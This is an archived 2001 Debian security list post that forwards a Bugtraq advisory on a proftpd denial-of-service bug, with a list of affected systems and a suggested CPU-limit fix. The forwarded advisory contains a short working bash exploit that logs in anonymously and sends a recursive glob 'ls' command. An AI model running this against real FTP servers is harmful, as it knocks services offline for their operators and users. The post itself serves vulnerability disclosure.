Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)

To: debian security list <debian-security@lists.debian.org>
Subject: Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
From: A.Didit Mifanto <didit@solindohost.com>
Date: Wed, 22 Aug 2001 07:53:56 +0700
Message-id: <[🔎] g0vMHC.A.XOF.YLwg7@murphy>
Reply-to: didit@solindohost.com

I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and still affects to this version of proftpd.
I see that  ftp://ftp.debian.org is still using this version, and I think also affected.

Thanks

Didit




------- Start of forwarded message -------
From: "Enrico Kern" <IphantomI@web.de>
To: bugtraq@securityfocus.com
Organization: http://freemail.web.de/
Subject: Multiple-Vendor-FTP-Vuln. (old?)
Date: 8/20/01 20:20:35

Hi,

i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
many new Linux-Dist.. When a user logged in in ftp and type
the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
the command 2 or 3x than the full system hang up. it also works in =
console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ  =
in march 01, but
it still works so i post it again.

affected:

RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?


Not vuln.:

latest Wu-Ftpd
Windows FTP-Server


Exploit:

#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20

Fix:

set cpu-limit for your anonymous user.

-------- End of forwarded message --------

Reply to:

Follow-Ups:
- Re: Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
  - From: Hans Spaans <cj.spaans@nexit.nl>

Prev by Date: Re: rpc.statd being attacked?
Next by Date: Re: rpc.statd being attacked?
Previous by thread: Re: rpc.statd being attacked?
Next by thread: Re: Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
Index(es):
- Date
- Thread